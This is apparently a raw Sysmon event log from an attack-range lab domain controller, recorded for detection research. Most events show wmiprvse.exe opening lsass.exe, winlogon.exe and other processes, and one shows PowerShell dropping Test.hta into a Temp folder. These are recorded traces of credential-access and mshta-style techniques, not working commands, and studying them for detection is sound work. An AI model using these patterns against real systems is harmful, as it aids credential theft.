16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029123Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x800000000000000029122Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.003{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Test.hta2021-01-20 16:01:39.003 10341000x800000000000000029319Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.409{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53E3-6008-AA06-00000000A301}7064C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029318Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.409{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53E3-6008-A906-00000000A301}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029317Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.409{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029316Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.409{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029315Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.409{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029314Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.409{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029313Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.409{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029312Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.409{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029311Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.409{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029310Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029309Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029308Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029307Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029306Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029305Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029304Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029303Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029302Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.393{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 